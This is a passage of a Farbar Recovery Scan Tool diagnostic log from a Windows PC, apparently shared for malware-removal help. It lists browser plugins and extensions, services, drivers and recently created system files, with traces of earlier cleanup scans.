FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll [2014-01-28] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-04-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-04-27] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-04-29] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-02-27] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2012-10-22] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1764878690-1872824068-2637823629-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Kevin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-09-27] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2011-10-02] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-02-27] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll [2010-01-13] (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2013-08-02] (Coupons, Inc.)

Chrome:
=======
CHR Profile: C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default [2016-10-14]
CHR Extension: (Google Slides) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-13]
CHR Extension: (Google Docs) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-13]
CHR Extension: (Google Drive) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-13]
CHR Extension: (YouTube) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-13]
CHR Extension: (Google Search) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-13]
CHR Extension: (Google Sheets) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-13]
CHR Extension: (Google Docs Offline) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-30]
CHR Extension: (Gmail) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-13]
CHR HKLM-x32\...\Chrome\Extension: [pacgpkgadgmibnhpdidcnfafllnmeomc] - <no Path/update_url>

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-08-05] (Apple Inc.)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [245760 2010-01-25] (Brother Industries, Ltd.) [File not signed]
S3 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [803856 2016-01-28] (Garmin Ltd. or its subsidiaries)
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [923136 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89864 2014-12-11] (Hewlett-Packard Company)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [325224 2014-09-17] (Intel Corporation)
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2013-12-10] () [File not signed]
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [293080 2015-02-05] (Realtek Semiconductor)
R2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [275968 2007-05-28] (Rocket Division Software) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [16776 2011-07-29] () [File not signed]
S3 epmntdrv; C:\Windows\SysWOW64\epmntdrv.sys [14216 2011-07-29] () [File not signed]
S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [9096 2011-07-29] () [File not signed]
S3 EuGdiDrv; C:\Windows\SysWOW64\EuGdiDrv.sys [8456 2011-07-29] () [File not signed]
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-14] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
R3 mv2; C:\Windows\System32\DRIVERS\mv2.sys [12096 2012-06-12] (UVNC BVBA)
S3 pwdrvio; C:\Windows\system32\pwdrvio.sys [19032 2012-08-20] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12384 2012-08-20] ()
R3 RemotePCmirror; C:\Windows\System32\DRIVERS\RemotePCmirror.sys [11368 2012-06-12] (Pro Softnet Crop provider)
R3 RTWlanE; C:\Windows\System32\DRIVERS\rtwlane.sys [1480776 2013-02-08] (Realtek Semiconductor Corporation                           )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [871408 2009-10-17] () [File not signed]
S3 stdpms; C:\Windows\System32\DRIVERS\stdpms.sys [28904 2013-10-22] (Splashtop Inc.)
U3 alz4j5u7; C:\Windows\System32\Drivers\alz4j5u7.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz130; \??\C:\Users\Kevin\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 NVIDIAHWAccess; \??\C:\Users\Kevin\AppData\Roaming\NVIDIA\HWAccess.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 00:12 - 2016-10-19 00:13 - 00051629 _____ C:\Users\Kevin\Desktop\FRST.txt
2016-10-19 00:11 - 2016-10-19 00:12 - 00000000 ____D C:\FRST
2016-10-19 00:11 - 2016-10-19 00:11 - 02407424 _____ (Farbar) C:\Users\Kevin\Desktop\FRST64.exe
2016-10-14 20:53 - 2016-10-14 20:58 - 00186824 _____ C:\Windows\ntbtlog.txt
2016-10-14 19:59 - 2016-10-14 19:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileASSASSIN
2016-10-14 19:59 - 2016-10-14 19:59 - 00000000 ____D C:\Program Files (x86)\FileASSASSIN
2016-10-14 19:38 - 2016-10-14 19:40 - 00217284 _____ C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt
2016-10-14 19:37 - 2016-10-14 19:38 - 00217270 _____ C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt
2016-10-14 10:17 - 2016-10-14 20:09 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\Oracle
2016-10-10 17:53 - 2016-10-10 17:53 - 00068983 _____ C:\Users\Kevin\Desktop\rental.pdf
2016-10-10 17:21 - 2016-10-10 17:21 - 00194014 _____ C:\Users\Kevin\Desktop\flight.pdf
2016-10-09 22:09 - 2016-10-09 22:09 - 00227000 ____H C:\Windows\system32\mlfcache.dat
2016-10-09 14:44 - 2016-10-09 14:44 - 00637617 _____ C:\Users\Kevin\Desktop\Attachment.pdf
2016-09-24 10:10 - 2016-09-24 11:07 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-09-23 07:32 - 2016-10-15 12:26 - 00000000 ____D C:\Users\Kevin\AppData\LocalLow\uTorrent
2016-09-22 23:58 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-09-22 23:58 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-09-22 23:58 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-09-22 23:58 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-09-22 23:58 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-09-22 23:58 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-09-22 23:58 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-09-22 23:58 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-09-22 23:58 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-09-22 23:58 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-09-22 23:58 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-09-22 23:58 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
